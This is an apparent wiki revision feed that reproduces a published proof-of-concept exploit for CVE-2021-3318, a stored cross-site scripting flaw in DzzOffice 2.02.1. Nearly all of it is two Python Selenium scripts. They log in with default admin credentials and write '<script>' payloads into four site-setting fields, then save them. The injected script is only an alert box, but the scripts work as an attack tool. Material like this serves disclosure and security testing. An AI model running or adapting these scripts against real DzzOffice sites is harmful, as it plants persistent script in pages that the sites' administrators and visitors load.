https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-3318_DzzOffice_2.02.1_XSS%E6%BC%8F%E6%B4%9E
CVE-2021-3318 DzzOffice 2.02.1 XSS漏洞 - Revision history
2026-04-10T01:52:24Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-3318_DzzOffice_2.02.1_XSS%E6%BC%8F%E6%B4%9E&diff=1887&oldid=prev
Pwnwiki: 建立內容為「==XSS== <pre> # Exploit Title: DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS) # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty, g3ck0dr1v3…」的新頁面
2021-04-24T01:35:47Z
<p>建立內容為「==XSS== <pre> # Exploit Title: DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS) # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty, g3ck0dr1v3…」的新頁面</p>
<p><b>New page</b></p><div>==XSS==<br />
<pre><br />
# Exploit Title: DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)<br />
# Author: @nu11secur1ty<br />
# Testing and Debugging: @nu11secur1ty, g3ck0dr1v3r<br />
# Date: 04/23/2021<br />
# Vendor: http://www.dzzoffice.com/<br />
# Link: https://github.com/zyx0814/dzzoffice<br />
# CVE: CVE-2021-3318<br />
<br />
[+] Exploit Source:<br />
<br />
#!/usr/bin/python3<br />
# Author: @nu11secur1ty<br />
# CVE-2021-3318<br />
<br />
from selenium import webdriver<br />
import time<br />
import os<br />
<br />
<br />
#enter the link to the website you want to automate login.<br />
website_link="http://localhost/dzzoffice/user.php?mod=login"<br />
<br />
#enter your login username<br />
username="admin@dzzoffice.com"<br />
<br />
#enter your login password<br />
password="password"<br />
<br />
#enter the element for username input field<br />
element_for_username="email"<br />
#enter the element for password input field<br />
element_for_password="password"<br />
#enter the element for submit button<br />
element_for_submit="loginsubmit"<br />
<br />
# Dai brauzura aaa ta eba<br />
browser = webdriver.Chrome() #uncomment this line,for chrome users<br />
<br />
# Otvarai da ne vlazam s kasata<br />
browser.get((website_link))<br />
<br />
# Run...<br />
try:<br />
username_element = browser.find_element_by_name(element_for_username)<br />
username_element.send_keys(username)<br />
password_element = browser.find_element_by_name(element_for_password)<br />
password_element.send_keys(password)<br />
<br />
### Login<br />
signInButton = browser.find_element_by_name(element_for_submit)<br />
signInButton.click()<br />
<br />
### Exploit<br />
#time.sleep(3)<br />
element_for_natrutvanie="admin_password"<br />
laina="http://localhost/dzzoffice/admin.php?mod=appmarket&op=cloudappmarket"<br />
browser.get((laina))<br />
<br />
### Next level... :)<br />
os.system("python poc_login_1.py")<br />
<br />
print("payload is deployed_0...\n")<br />
except Exception:<br />
<br />
#### This exception occurs if the element are not found in the webpage.<br />
print("Some error occured :(")<br />
<br />
### os.system<br />
<br />
#!/usr/bin/python3<br />
# Author: @nu11secur1ty<br />
# CVE-2021-3318<br />
<br />
from selenium import webdriver<br />
import time<br />
<br />
<br />
#enter the link to the website you want to automate login.<br />
website_link="http://localhost/dzzoffice/admin.php?mod=setting"<br />
<br />
#enter your login username<br />
username="admin@dzzoffice.com"<br />
<br />
#enter your login password<br />
password="password"<br />
<br />
<br />
#enter the element for username input field<br />
element_for_username="admin_email"<br />
<br />
#enter the element for password input field<br />
element_for_password="admin_password"<br />
<br />
#enter the element for submit button<br />
element_for_submit="submit"<br />
<br />
# Dai brauzura aaa ta eba<br />
browser = webdriver.Chrome() #uncomment this line,for chrome users<br />
<br />
# Otvarai da ne vlazam s kasata<br />
browser.get((website_link))<br />
<br />
# Run...<br />
try:<br />
username_element = browser.find_element_by_name(element_for_username)<br />
username_element.send_keys(username)<br />
password_element = browser.find_element_by_name(element_for_password)<br />
password_element.send_keys(password)<br />
<br />
### Login<br />
signInButton = browser.find_element_by_name(element_for_submit)<br />
signInButton.click()<br />
<br />
### Exploit<br />
time.sleep(3)<br />
element_for_natrutvanie="settingsubmit"<br />
laina="http://localhost/dzzoffice/admin.php?mod=setting"<br />
browser.get((laina))<br />
<br />
### Inner text...<br />
browser.execute_script("document.querySelector('[name=\"settingnew[metakeywords]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")<br />
browser.execute_script("document.querySelector('[name=\"settingnew[sitebeian]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")<br />
browser.execute_script("document.querySelector('[name=\"settingnew[metadescription]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")<br />
browser.execute_script("document.querySelector('[name=\"settingnew[statcode]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")<br />
<br />
time.sleep(5)<br />
<br />
# Submit exploit<br />
signInButton = browser.find_element_by_name(element_for_natrutvanie)<br />
signInButton.click()<br />
<br />
print("payload is deployed_1...\n")<br />
except Exception:<br />
<br />
#### This exception occurs if the element are not found in the webpage.<br />
print("Some error occured :(")<br />
</pre></div>
Pwnwiki